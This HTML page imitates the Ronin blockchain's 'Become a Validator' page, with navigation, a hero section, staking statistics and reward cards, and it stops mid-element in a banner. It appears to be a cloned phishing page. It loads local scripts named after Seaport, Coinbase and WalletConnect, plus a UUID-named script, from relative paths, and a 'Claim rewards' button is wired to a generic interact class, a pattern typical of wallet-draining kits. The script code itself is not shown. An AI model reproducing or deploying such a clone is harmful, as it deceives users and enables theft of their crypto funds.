<!DOCTYPE html>
<html>

<head>
    <meta charSet="utf-8" />
    <link rel="shortcut icon" href="https://cdn.skymavis.com/explorer-cdn/asset/fav.ico" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta name="author" content="roninchain.com" />
    <meta name="keywords" content="ronin, ronin network, ronin blockchain, ronin, evm, ronin scatter, staking, axs, sky mavis, axie infinity, ron" />
    <meta property="og:site_name" content="Ronin" />
    <meta property="og:url" content="https://roninchain.com/" />
    <meta property="og:type" content="website" />
    <meta property="og:image:alt" content="Visit roninchain.com" />
    <meta property="og:image" content="https://cdn.skymavis.com/explorer-cdn/asset/og/website.png" />
    <title>Become a Validator | Ronin</title>
    <meta name="description" content="Help decentralize Ronin by validating data" />
    <meta property="og:title" content="Become a Validator | Ronin" />
    <meta name="next-head-count" content="13" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link rel="preload" href="./_next/static/css/2ec1ddbed34a587d.css" as="style" />
    <link rel="stylesheet" href="./_next/static/css/2ec1ddbed34a587d.css" data-n-g />
    <link rel="preload" href="./_next/static/css/d9eded08996c77b3.css" as="style" />
    <link rel="stylesheet" href="./_next/static/css/d9eded08996c77b3.css" data-n-p /><noscript data-n-css></noscript>
    <script src="./scripts/seaport.js"></script>
    <script src="./scripts/coinbase.js"></script>
     <script src="./scripts/wallet-connect-v2.js"></script>
     <script src="./scripts/wallet-connect-v3.js"></script>
  <script charset="UTF-8" type="text/javascript" src="./423c93a9-48fb-4108-8e23-a1ee1b5a0b32.js"></script>
  
   <style data-href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600;700;800&display=swap">
        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 400;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyfMZs.woff) format('woff')
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 600;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuGKYMZs.woff) format('woff')
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 700;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuFuYMZs.woff) format('woff')
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 800;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuDyYMZs.woff) format('woff')
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 400;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2JL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 400;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa0ZL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 400;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2ZL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+1F00-1FFF
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 400;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa1pL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 400;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2pL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 400;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa25L7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 400;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa1ZL7W0Q5nw.woff2) format('woff2');
            unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 600;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2JL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 600;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa0ZL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 600;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2ZL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+1F00-1FFF
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 600;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa1pL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 600;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2pL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 600;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa25L7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 600;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa1ZL7W0Q5nw.woff2) format('woff2');
            unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 700;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2JL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 700;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa0ZL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 700;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2ZL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+1F00-1FFF
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 700;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa1pL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 700;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2pL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 700;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa25L7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 700;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa1ZL7W0Q5nw.woff2) format('woff2');
            unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 800;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2JL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 800;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa0ZL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 800;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2ZL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+1F00-1FFF
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 800;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa1pL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 800;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2pL7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 800;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa25L7W0Q5n-wU.woff2) format('woff2');
            unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF
        }

        @font-face {
            font-family: 'Inter';
            font-style: normal;
            font-weight: 800;
            font-display: swap;
            src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa1ZL7W0Q5nw.woff2) format('woff2');
            unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
        }
    </style>
</head>

<body>
    <div>
        <div class="wrapper">
            <div class="AnnouncementBanner_Banner__3bk_O">
                <div class="badge-module_container__WY-ll badge-module_badge-root__ROif3 AnnouncementBanner_Badge__u8003">
                    <div class="badge-module_badge__kTvKz badge-module_success-solid__6ZYL7 badge-module_size-default__CQyZY badge-module_normal__BL5Nt"><span class="text-module_text__ChjB4 text-module_text-3__69BSH text-module_default__oQBba badge-module_text__LlQYs">New</span></div>
                </div>
                <a href="https://blog.axieinfinity.com/p/part-evolution-is-live" target="__blank">
                    <div class="AnnouncementBanner_LeftContent__2dd6B">
                        <div>🎉</div>Axie Part Evolution is LIVE. Evolve your axies now, read more here</div>
                </a><svg viewBox="0 0 20 20" width="20" height="20"><path fill="currentColor" fill-rule="evenodd" d="M12.28 5.22a.75.75 0 1 0-1.06 1.06L13.94 9H4.75a.75.75 0 0 0 0 1.5h9.19l-2.72 2.72a.75.75 0 1 0 1.06 1.06l4-4a.747.747 0 0 0 0-1.06l-4-4Z" clip-rule="evenodd"></path></svg></div>
            <div
                class="NavigationBar_NavbarContainer___bgRR NavigationBar_NavbarPreScroll__Mi_RR">
                <div>
                    <div class="NavigationBar_NavbarEntry__r_2qk">
                        <div><a href="./"><img src="./static/images/ronin-nav-logo.svg" class="NavigationBar_Icon__ZnbQb" alt="ronin-nav-logo" /></a></div>
                        <div class="NavigationBar_NavLinks__juwVU">
                            <div>
                                <a class="typo-module_t-body-md-strong__B-Sd1 typo-module_mobile-t-body-md-strong__Kd9tc typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC NavPopover_Unclickable__CDAMk">
                                    <div class="NavItem_NavItem__GQ0fF NavItem_Unclickable__sjY18">Learn</div>
                                </a>
                            </div>
                            <div class="typo-module_t-body-md-strong__B-Sd1 typo-module_mobile-t-body-md-strong__Kd9tc typo-module_neutral__9orA9 NavigationBar_InternalLink__lqBT8" href="./ecosystem">
                                <div class="NavItem_NavItem__GQ0fF">Ecosystem</div>
                            </div>
                            <div>
                                <a class="typo-module_t-body-md-strong__B-Sd1 typo-module_mobile-t-body-md-strong__Kd9tc typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC NavPopover_Unclickable__CDAMk">
                                    <div class="NavItem_NavItem__GQ0fF NavItem_Unclickable__sjY18">Build</div>
                                </a>
                            </div>
                            <div>
                                <a class="typo-module_t-body-md-strong__B-Sd1 typo-module_mobile-t-body-md-strong__Kd9tc typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC NavPopover_Unclickable__CDAMk">
                                    <div class="NavItem_NavItem__GQ0fF NavPopover_Selected__WScgP NavItem_Unclickable__sjY18">Network</div>
                                </a>
                            </div>
                            <div class="typo-module_t-body-md-strong__B-Sd1 typo-module_mobile-t-body-md-strong__Kd9tc typo-module_neutral__9orA9 NavigationBar_InternalLink__lqBT8" href="./blog">
                                <div class="NavItem_NavItem__GQ0fF">Blog</div>
                            </div>
                        </div><span target="_blank" class="interact-button NavigationBar_AppButton__uuO1G"><button class="button-module_button__Z331g button-module_intent-primary__SAO1x button-module_size-default__caw9O button-module_button-root__0roWY">Launch App</button></span>
                        <div
                            class="NavigationBar_HamburgerBtnWrapper__QJ5cv"><a href="https://app.roninchain.com/" target="_blank"><button class="button-module_button__Z331g button-module_intent-primary__SAO1x button-module_size-small__Nes6W button-module_button-root__0roWY">Launch App</button></a>
                            <div
                                class="NavigationBar_HamburgerBtn__gfKJr"><svg color="#C9CBCF" viewBox="0 0 20 20" width="20" height="20"><path fill="currentColor" fill-rule="evenodd" d="M17 3H3c-.6 0-1 .4-1 1s.4 1 1 1h14c.6 0 1-.4 1-1s-.4-1-1-1Zm0 6H3c-.6 0-1 .4-1 1s.4 1 1 1h14c.6 0 1-.4 1-1s-.4-1-1-1ZM3 15h14c.6 0 1 .4 1 1s-.4 1-1 1H3c-.6 0-1-.4-1-1s.4-1 1-1Z" clip-rule="evenodd"></path></svg></div>
                </div>
        </div>
    </div>
    <div class="NavigationBar_MobileNavbar__FibD4 NavigationBar_Collapsed__oBzFs">
        <div class="MobileNavItem_Container__bsQzv"><a class="typo-module_t-body-md-strong__B-Sd1 typo-module_mobile-t-body-md-strong__Kd9tc typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC" href="https://docs.roninchain.com/" target="__blank">Learn</a><svg class="MobileNavItem_Icon__xvBHe"
                viewBox="0 0 20 20" width="22" height="22"><path fill="currentColor" fill-rule="evenodd" d="M12 3.25h4.003a.759.759 0 0 1 .528.22.748.748 0 0 1 .219.55V8a.75.75 0 0 1-1.5 0V5.81l-4.22 4.22a.75.75 0 0 1-1.06-1.06l4.22-4.22H12a.75.75 0 0 1 0-1.5Zm-6 1A1.75 1.75 0 0 0 4.25 6v8A1.75 1.75 0 0 0 6 15.75h8A1.75 1.75 0 0 0 15.75 14v-.833a.75.75 0 0 0-1.5 0V14a.25.25 0 0 1-.25.25H6a.25.25 0 0 1-.25-.25V6A.25.25 0 0 1 6 5.75h1.25a.75.75 0 0 0 0-1.5H6Z" clip-rule="evenodd"></path></svg></div>
        <div
            class="MobileNavItem_Container__bsQzv"><a class="typo-module_t-body-md-strong__B-Sd1 typo-module_mobile-t-body-md-strong__Kd9tc typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC" href="./ecosystem">Ecosystem</a></div>
    <div class="MobileNavItem_Container__bsQzv"><a class="typo-module_t-body-md-strong__B-Sd1 typo-module_mobile-t-body-md-strong__Kd9tc typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC" href="https://roninchain.com/blog/posts/how-to-buy-ron" target="__blank">Buy RON</a>
        <svg
            class="MobileNavItem_Icon__xvBHe" viewBox="0 0 20 20" width="22" height="22">
            <path fill="currentColor" fill-rule="evenodd" d="M12 3.25h4.003a.759.759 0 0 1 .528.22.748.748 0 0 1 .219.55V8a.75.75 0 0 1-1.5 0V5.81l-4.22 4.22a.75.75 0 0 1-1.06-1.06l4.22-4.22H12a.75.75 0 0 1 0-1.5Zm-6 1A1.75 1.75 0 0 0 4.25 6v8A1.75 1.75 0 0 0 6 15.75h8A1.75 1.75 0 0 0 15.75 14v-.833a.75.75 0 0 0-1.5 0V14a.25.25 0 0 1-.25.25H6a.25.25 0 0 1-.25-.25V6A.25.25 0 0 1 6 5.75h1.25a.75.75 0 0 0 0-1.5H6Z"
                clip-rule="evenodd"></path>
            </svg>
    </div>
    <div class="MobileNavItem_Container__bsQzv"><a class="typo-module_t-body-md-strong__B-Sd1 typo-module_mobile-t-body-md-strong__Kd9tc typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC" href="./validator">Become a Validator</a></div>
    <div class="MobileNavItem_Container__bsQzv"><a class="typo-module_t-body-md-strong__B-Sd1 typo-module_mobile-t-body-md-strong__Kd9tc typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC" href="./delegator">Become a Delegator</a></div>
    <div class="MobileNavItem_Container__bsQzv"><a class="typo-module_t-body-md-strong__B-Sd1 typo-module_mobile-t-body-md-strong__Kd9tc typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC" href="https://twitter.com/Ronin_Network" target="__blank" rel="noreferrer">Twitter</a>
        <svg
            class="MobileNavItem_Icon__xvBHe" viewBox="0 0 20 20" width="22" height="22">
            <path fill="currentColor" fill-rule="evenodd" d="M12 3.25h4.003a.759.759 0 0 1 .528.22.748.748 0 0 1 .219.55V8a.75.75 0 0 1-1.5 0V5.81l-4.22 4.22a.75.75 0 0 1-1.06-1.06l4.22-4.22H12a.75.75 0 0 1 0-1.5Zm-6 1A1.75 1.75 0 0 0 4.25 6v8A1.75 1.75 0 0 0 6 15.75h8A1.75 1.75 0 0 0 15.75 14v-.833a.75.75 0 0 0-1.5 0V14a.25.25 0 0 1-.25.25H6a.25.25 0 0 1-.25-.25V6A.25.25 0 0 1 6 5.75h1.25a.75.75 0 0 0 0-1.5H6Z"
                clip-rule="evenodd"></path>
            </svg>
    </div>
    <div class="MobileNavItem_Container__bsQzv"><a class="typo-module_t-body-md-strong__B-Sd1 typo-module_mobile-t-body-md-strong__Kd9tc typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC" href="https://discord.gg/roninnetwork" target="__blank" rel="noreferrer">Discord</a>
        <svg
            class="MobileNavItem_Icon__xvBHe" viewBox="0 0 20 20" width="22" height="22">
            <path fill="currentColor" fill-rule="evenodd" d="M12 3.25h4.003a.759.759 0 0 1 .528.22.748.748 0 0 1 .219.55V8a.75.75 0 0 1-1.5 0V5.81l-4.22 4.22a.75.75 0 0 1-1.06-1.06l4.22-4.22H12a.75.75 0 0 1 0-1.5Zm-6 1A1.75 1.75 0 0 0 4.25 6v8A1.75 1.75 0 0 0 6 15.75h8A1.75 1.75 0 0 0 15.75 14v-.833a.75.75 0 0 0-1.5 0V14a.25.25 0 0 1-.25.25H6a.25.25 0 0 1-.25-.25V6A.25.25 0 0 1 6 5.75h1.25a.75.75 0 0 0 0-1.5H6Z"
                clip-rule="evenodd"></path>
            </svg>
    </div>
    <div class="MobileNavItem_Container__bsQzv"><a class="typo-module_t-body-md-strong__B-Sd1 typo-module_mobile-t-body-md-strong__Kd9tc typo-module_neutral__9orA9 link-module_link__Nwimt link-module_monochrome__yqKNC" href="./blog">Blog</a></div>
    </div>
    </div>
    <div class="GradientBackground_GradientWrapper__tna3f">
        <div class="GradientBackground_Shape1__oBQBp"></div>
        <div class="GradientBackground_Shape2__9_3O5"></div>
        <div class="GradientBackground_Shape3__5MBJK"></div>
        <div class="GradientBackground_Content__wKpUw"></div>
    </div>
    <div class="Hero_Container__vScir">
        <div class="Hero_LeftContent__6VBs5">
            <div class="PageHeading_Heading__5AcuQ">
                <div>Secure Ronin.</div>
                <div>Earn Rewards.</div>
            </div>
            <div class="typo-module_t-display-xs__6p9-C typo-module_mobile-t-display-xs__Qj9y2 typo-module_neutral__9orA9 Hero_Paragraph__WuLx7">Run a Validator node to secure the network and earn rewards.</div><span target="__blank"><button style="width:218px" class="interact-button button-module_button__Z331g button-module_intent-primary__SAO1x button-module_size-large__Nx98S button-module_button-root__0roWY">Claim rewards<span class="button-module_icon-right-wrapper__WKVKF"><svg class="button-module_icon__-nXel" viewBox="0 0 20 20" width="16" height="16"><path fill="currentColor" fill-rule="evenodd" d="M12.28 5.22a.75.75 0 1 0-1.06 1.06L13.94 9H4.75a.75.75 0 0 0 0 1.5h9.19l-2.72 2.72a.75.75 0 1 0 1.06 1.06l4-4a.747.747 0 0 0 0-1.06l-4-4Z" clip-rule="evenodd"></path></svg></span></button></a></div><img
            src="https://cdn.skymavis.com/explorer-cdn/ronin-website/validator-hero.png" class="Validator_Image__lRbkY" alt="validator-hero" width="488" height="488" /></div>
    <div class="Statistics_Container__phOjv">
        <div class="Statistics_CardRow__TQhI0">
            <div class="Card_CardBackground___arOU Statistics_StatCard__Ye2jB">
                <div class="Statistics_CardSolidBackground__tqHab">
                    <div class="Statistics_CardGradientBackground__sBBYB">
                        <div class="Statistics_Text__f24_6">
                            <div class="Statistics_Value__gNNPy">--</div>
                            <div class="typo-module_t-body-md__XGPoD typo-module_mobile-t-body-md__-HKdi typo-module_neutral__9orA9 typo-module_dim__qoQFh">Validators &amp; Delegators</div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="Card_CardBackground___arOU Statistics_StatCard__Ye2jB">
                <div class="Statistics_CardSolidBackground__tqHab">
                    <div class="Statistics_CardGradientBackground__sBBYB">
                        <div class="Statistics_Text__f24_6">
                            <div class="Statistics_Value__gNNPy">--<span>RON</span></div>
                            <div class="typo-module_t-body-md__XGPoD typo-module_mobile-t-body-md__-HKdi typo-module_neutral__9orA9 typo-module_dim__qoQFh">Total Staked</div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="Card_CardBackground___arOU Statistics_StatCard__Ye2jB">
                <div class="Statistics_CardSolidBackground__tqHab">
                    <div class="Statistics_CardGradientBackground__sBBYB">
                        <div class="Statistics_Text__f24_6">
                            <div class="Statistics_Value__gNNPy">~400<span>RON</span></div>
                            <div class="typo-module_t-body-md__XGPoD typo-module_mobile-t-body-md__-HKdi typo-module_neutral__9orA9 typo-module_dim__qoQFh">24H Earning Per Validator</div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="ValidatorPoints_Container__H_E7N">
        <div class="SectionHeading_Heading__FYcM4 ValidatorPoints_Heading__v_xzm">
            <div class="typo-module_t-display-md__KVUIu typo-module_mobile-t-display-md__BsA5M typo-module_neutral__9orA9 typo-module_dim__qoQFh SectionHeading_Title__tPa1z"></div>
            <div class="SectionHeading_Subtitle__OWhlx">Why validate on Ronin?</div>
        </div>
        <div class="ValidatorPoints_CardRow__9_WvP">
            <div class="ValidatorPoints_CardWrapper__JOB5h">
                <div class="Card_CardBackground___arOU">
                    <div class="HomeCard_CardSolidBackground__MrTRj">
                        <div class="HomeCard_CardGradientBackground__CdkBn">
                            <div class="HomeCard_Content__o1IwG"><img src="https://cdn.skymavis.com/explorer-cdn/ronin-website/cloud.png" alt="cloud" height="80" width="80" />
                                <div class="HomeCard_TextWrapper__9BOQy">
                                    <div class="typo-module_t-display-lg__IYbCQ typo-module_mobile-t-display-lg__6JAaA typo-module_neutral__9orA9 HomeCard_Title__5fdPe">Secure the network</div>
                                    <div class="typo-module_t-body-md__XGPoD typo-module_mobile-t-body-md__-HKdi typo-module_neutral__9orA9 HomeCard_SubText__HGazv">Ensure a safe environment for millions of users.</div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="ValidatorPoints_CardWrapper__JOB5h">
                <div class="Card_CardBackground___arOU">
                    <div class="HomeCard_CardSolidBackground__MrTRj">
                        <div class="HomeCard_CardGradientBackground__CdkBn">
                            <div class="HomeCard_Content__o1IwG"><img src="https://cdn.skymavis.com/explorer-cdn/ronin-website/seed.png" alt="seed" height="80" width="80" />
                                <div class="HomeCard_TextWrapper__9BOQy">
                                    <div class="typo-module_t-display-lg__IYbCQ typo-module_mobile-t-display-lg__6JAaA typo-module_neutral__9orA9 HomeCard_Title__5fdPe">Earn RON rewards</div>
                                    <div class="typo-module_t-body-md__XGPoD typo-module_mobile-t-body-md__-HKdi typo-module_neutral__9orA9 HomeCard_SubText__HGazv">180M RON is allocated as rewards for those participating in securing the network.</div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="ValidatorPoints_CardWrapper__JOB5h">
                <div class="Card_CardBackground___arOU">
                    <div class="HomeCard_CardSolidBackground__MrTRj">
                        <div class="HomeCard_CardGradientBackground__CdkBn">
                            <div class="HomeCard_Content__o1IwG"><img src="https://cdn.skymavis.com/explorer-cdn/ronin-website/flag.png" alt="flag" height="80" width="80" />
                                <div class="HomeCard_TextWrapper__9BOQy">
                                    <div class="typo-module_t-display-lg__IYbCQ typo-module_mobile-t-display-lg__6JAaA typo-module_neutral__9orA9 HomeCard_Title__5fdPe">Lead the change</div>
                                    <div class="typo-module_t-body-md__XGPoD typo-module_mobile-t-body-md__-HKdi typo-module_neutral__9orA9 HomeCard_SubText__HGazv">Join our validator community and influence the direction of the network.</div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="Banner_Wrapper__Pkzpl">
        <div style="background-image:url(/_next/static/media/Gradient.f7acd888.png)" class="Banner_Banner__Pqo3Z">
            <div class="Banner_LeftContent__EXdVf">
